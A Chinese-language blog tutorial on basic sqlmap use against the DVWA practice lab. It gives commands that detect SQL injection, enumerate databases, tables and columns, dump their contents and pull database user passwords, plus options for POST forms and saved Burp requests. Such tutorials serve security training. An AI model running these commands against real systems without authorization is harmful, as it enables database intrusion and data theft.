您的位置: 首页  >  文章  >  sqlmap的一些基本使用

sqlmap的一些基本使用

分类: 文章 2024-05-10 09:37:10

有些网站需要登入的所以必须加cookie绕过登入,不需要登入则不用加

----------------------------------------------------------------------------------

一般步骤:
sqlmap.py -u “http://xxx/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=84693b0adede1f2ab0e8ea4e0e5e580e” 找注入点

sqlmap.py -u “http://xxx/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=84693b0adede1f2ab0e8ea4e0e5e580e” --dbs 获取所有数据库

…省略 -D aaa --tables 获取数据库aaa的所有表

…省略 -D aaa -T bbb --columns 获取数据库aaa中bbb表的所有字段

…省略 -D aaa -T bbb -C ccc --dump 获取数据库aaa中bbb表中ccc字段的所有内容

----------------------------------------------------------------------------------

其它的一些常用命令:

…省略 --current-db 获取当前数据库

…省略 --current-user 获取当前用户

…省略 --passwords 获取数据库用户和密码

–batch
用此参数,不需要用户输入,将会使用sqlmap提示的默认值一直运行下去

-r
加载文件,sqlmap可以从一个文本文件中获取HTTP请求,这样就可以跳过设置一些其他参数,比如cookie,POST数据。当请求是HTTPS的时候你需要配合这个–force-ssl参数来使用)

-p 指定参数
多个参数想注入某个参数加-p
----------------------------------------------------------------------------------
对于POST提交的方法:

一: 自动搜索表单的方式
sqlmap.py -u “http://xxx/dvwa/vulnerabilities/sqli” --cookie=“security=medium;PHPSESSID=c59a16f4e99f5863f1844537959ab085” --forms 可以加 --dbs然后就按照一般步骤来

sqlmap会显示以下提示

sqlmap got a 301 redirect to ‘http://xxx/dvwa/vulnerabilities/sqli/’. Do you want to follow? [Y/n] 意思是:sqlmap得到一个301重定向到“http://xxx/dvwa/vulnerabilities/sqli/”。你想跟着我吗? 填Y

do you want to test this form? [Y/n/q] 意思是:你想测试这个表格吗?填Y

Edit POST data [default: id=1&Submit=Submit]: 意思是:编辑发布数据[默认:id=1&Submit=Submit]:直接回车默认就可以了

redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] 意思是:重定向是POST请求的结果。是否要将原始邮件数据重新发送到新位置?填Y

do you want to exploit this SQL injection? [Y/n] 意思是:是否要利用此SQL注入?填Y

二: 指定参数
sqlmap.py -u “http://xxx/dvwa/vulnerabilities/sqli” --cookie=“security=medium;PHPSESSID=c59a16f4e99f5863f1844537959ab085” --data “id=1”(如果是多个参数则加&,比如–data "id=admin&passwords=abc&submit=submit) 可以加 --dbs然后就按照一般步骤来

三:用Burp抓包,然后保存抓取到的内容。例如:保存为kilo.txt,然后把它放至某个目录下
sqlmap.py -r “D:/kilo.txt” -p id (同理多个参数加&,也可以去掉-p,但是多个参数想注入某个参数则加-p) 可以加 --dbs然后就按照一般步骤来

sqlmap的一些基本使用

sqlmap的一些基本使用

相关推荐